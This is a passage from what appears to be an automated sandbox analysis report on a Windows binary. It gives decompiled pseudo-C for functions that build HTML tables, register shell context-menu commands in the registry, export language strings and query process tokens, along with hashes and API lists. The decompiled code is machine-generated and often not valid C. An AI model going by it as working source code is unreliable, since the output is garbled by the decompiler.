                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                0x00407763
                                                                                                                0x0040776c
                                                                                                                0x00407784
                                                                                                                0x0040778b
                                                                                                                0x00407797
                                                                                                                0x00407799
                                                                                                                0x0040779b
                                                                                                                0x004077a7
                                                                                                                0x004077ae
                                                                                                                0x004077bd
                                                                                                                0x004077c4
                                                                                                                0x004077d3
                                                                                                                0x004077da
                                                                                                                0x004077e1
                                                                                                                0x004077e6
                                                                                                                0x004077f2
                                                                                                                0x004077f5
                                                                                                                0x00407804
                                                                                                                0x00407805
                                                                                                                0x00407810
                                                                                                                0x00407812
                                                                                                                0x00407813
                                                                                                                0x00407818
                                                                                                                0x00407818
                                                                                                                0x00407825
                                                                                                                0x0040782d
                                                                                                                0x00407830
                                                                                                                0x0040783a
                                                                                                                0x00407840
                                                                                                                0x00407846
                                                                                                                0x00407849
                                                                                                                0x00407850
                                                                                                                0x0040785e
                                                                                                                0x00407864
                                                                                                                0x00407867
                                                                                                                0x0040786b
                                                                                                                0x0040786f
                                                                                                                0x00407877
                                                                                                                0x0040787a
                                                                                                                0x00407885
                                                                                                                0x00407892
                                                                                                                0x004078a8
                                                                                                                0x004078b8
                                                                                                                0x004078c5
                                                                                                                0x004078ff
                                                                                                                0x004078c7
                                                                                                                0x004078ca
                                                                                                                0x004078dd
                                                                                                                0x004078de
                                                                                                                0x004078e3
                                                                                                                0x004078e8
                                                                                                                0x004078eb
                                                                                                                0x004078f0
                                                                                                                0x004078f0
                                                                                                                0x00407906
                                                                                                                0x00407909
                                                                                                                0x0040790f
                                                                                                                0x0040791d
                                                                                                                0x00407923
                                                                                                                0x0040792d
                                                                                                                0x00407932
                                                                                                                0x0040793b
                                                                                                                0x00407942
                                                                                                                0x00407943
                                                                                                                0x0040794c
                                                                                                                0x00407953
                                                                                                                0x00407954
                                                                                                                0x00407959
                                                                                                                0x0040795c
                                                                                                                0x00407961
                                                                                                                0x0040796c
                                                                                                                0x00407971
                                                                                                                0x0040797a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00407838
                                                                                                                0x00407838
                                                                                                                0x0040783a
                                                                                                                0x00407980
                                                                                                                0x0040798a
                                                                                                                0x004079a1

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                0x00407b65
                                                                                                                0x00407b7c
                                                                                                                0x00407b83
                                                                                                                0x00407b91
                                                                                                                0x00407b98
                                                                                                                0x00407ba6
                                                                                                                0x00407bad
                                                                                                                0x00407bb2
                                                                                                                0x00407bb9
                                                                                                                0x00407bca
                                                                                                                0x00407bcb
                                                                                                                0x00407bd6
                                                                                                                0x00407bdb
                                                                                                                0x00407bdc
                                                                                                                0x00407be1
                                                                                                                0x00407be1
                                                                                                                0x00407be8
                                                                                                                0x00407bf9
                                                                                                                0x00407bfa
                                                                                                                0x00407c05
                                                                                                                0x00407c0a
                                                                                                                0x00407c0b
                                                                                                                0x00407c1c
                                                                                                                0x00407c21
                                                                                                                0x00407c21
                                                                                                                0x00407c2a
                                                                                                                0x00407c2b
                                                                                                                0x00407c36
                                                                                                                0x00407c3b
                                                                                                                0x00407c3c
                                                                                                                0x00407c41
                                                                                                                0x00407c51
                                                                                                                0x00407c56
                                                                                                                0x00407c5b
                                                                                                                0x00407c65
                                                                                                                0x00407c68
                                                                                                                0x00407c6b
                                                                                                                0x00407c74
                                                                                                                0x00407c7b
                                                                                                                0x00407c80
                                                                                                                0x00407c82
                                                                                                                0x00407c88
                                                                                                                0x00407ca6
                                                                                                                0x00407c8a
                                                                                                                0x00407c8a
                                                                                                                0x00407c8b
                                                                                                                0x00407c96
                                                                                                                0x00407c9b
                                                                                                                0x00407c9c
                                                                                                                0x00407ca1
                                                                                                                0x00407ca1
                                                                                                                0x00407cb3
                                                                                                                0x00407cb4
                                                                                                                0x00407cbd
                                                                                                                0x00407cc4
                                                                                                                0x00407cc5
                                                                                                                0x00407cd0
                                                                                                                0x00407cd5
                                                                                                                0x00407cd6
                                                                                                                0x00407cdb
                                                                                                                0x00407ceb
                                                                                                                0x00407cf0
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00000000
                                                                                                                0x00407cfc
                                                                                                                0x00407d00

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                0x00404415
                                                                                                                0x0040441d
                                                                                                                0x0040442c
                                                                                                                0x00404435
                                                                                                                0x004045b3
                                                                                                                0x004045b7
                                                                                                                0x004045b7
                                                                                                                0x0040444b
                                                                                                                0x00404452
                                                                                                                0x00404457
                                                                                                                0x00404460
                                                                                                                0x00404461
                                                                                                                0x00404462
                                                                                                                0x0040446d
                                                                                                                0x00404472
                                                                                                                0x00404473
                                                                                                                0x00404490
                                                                                                                0x004044a5
                                                                                                                0x004044b4
                                                                                                                0x004044b6
                                                                                                                0x004044b7
                                                                                                                0x004044bd
                                                                                                                0x004044cf
                                                                                                                0x004044db
                                                                                                                0x004044eb
                                                                                                                0x004044f1
                                                                                                                0x004044f6
                                                                                                                0x004044f9
                                                                                                                0x004044fe
                                                                                                                0x00404506
                                                                                                                0x00404507
                                                                                                                0x00404508
                                                                                                                0x00404510
                                                                                                                0x00404521
                                                                                                                0x00404532
                                                                                                                0x00404539
                                                                                                                0x00404547
                                                                                                                0x0040454e
                                                                                                                0x0040455b
                                                                                                                0x0040455c
                                                                                                                0x00404564
                                                                                                                0x0040456f
                                                                                                                0x00404570
                                                                                                                0x00404571
                                                                                                                0x0040457c
                                                                                                                0x0040457d
                                                                                                                0x00404588
                                                                                                                0x00404589
                                                                                                                0x0040458a
                                                                                                                0x004045a0
                                                                                                                0x004045a5
                                                                                                                0x00404521
                                                                                                                0x004044eb
                                                                                                                0x004045ab
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                0x00406466
                                                                                                                0x0040647d
                                                                                                                0x00406484
                                                                                                                0x00406499
                                                                                                                0x004064a0
                                                                                                                0x004064af
                                                                                                                0x004064b4
                                                                                                                0x004064bb
                                                                                                                0x004064cd
                                                                                                                0x004064d2
                                                                                                                0x004064d4
                                                                                                                0x004064e4
                                                                                                                0x004064ea
                                                                                                                0x004064ea
                                                                                                                0x004064f3
                                                                                                                0x00406503
                                                                                                                0x00406514
                                                                                                                0x00406525
                                                                                                                0x0040653b
                                                                                                                0x0040654e
                                                                                                                0x00406568
                                                                                                                0x00406572
                                                                                                                0x0040657a
                                                                                                                0x00406582
                                                                                                                0x0040658a
                                                                                                                0x00406596

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                0x00409ab0
                                                                                                                0x00409ab7
                                                                                                                0x00409ac8
                                                                                                                0x00409acf
                                                                                                                0x00409ad4
                                                                                                                0x00409ae0
                                                                                                                0x00409ae6
                                                                                                                0x00409ae8
                                                                                                                0x00409af0
                                                                                                                0x00409c3a
                                                                                                                0x00409c41
                                                                                                                0x00409c67
                                                                                                                0x00000000
                                                                                                                0x00409c67
                                                                                                                0x00409c49
                                                                                                                0x00409c50
                                                                                                                0x00409c51
                                                                                                                0x00409c56
                                                                                                                0x00409c57
                                                                                                                0x00409c5a
                                                                                                                0x00000000
                                                                                                                0x00409c64
                                                                                                                0x00409b00
                                                                                                                0x00409b03
                                                                                                                0x00409b06
                                                                                                                0x00409b0b
                                                                                                                0x00409b10
                                                                                                                0x00409ba9
                                                                                                                0x00409bac
                                                                                                                0x00409bc1
                                                                                                                0x00409bc7
                                                                                                                0x00409bcc
                                                                                                                0x00409bd8
                                                                                                                0x00409bf0
                                                                                                                0x00409bf2
                                                                                                                0x00409c23
                                                                                                                0x00409c26
                                                                                                                0x00409c2f
                                                                                                                0x00409c34
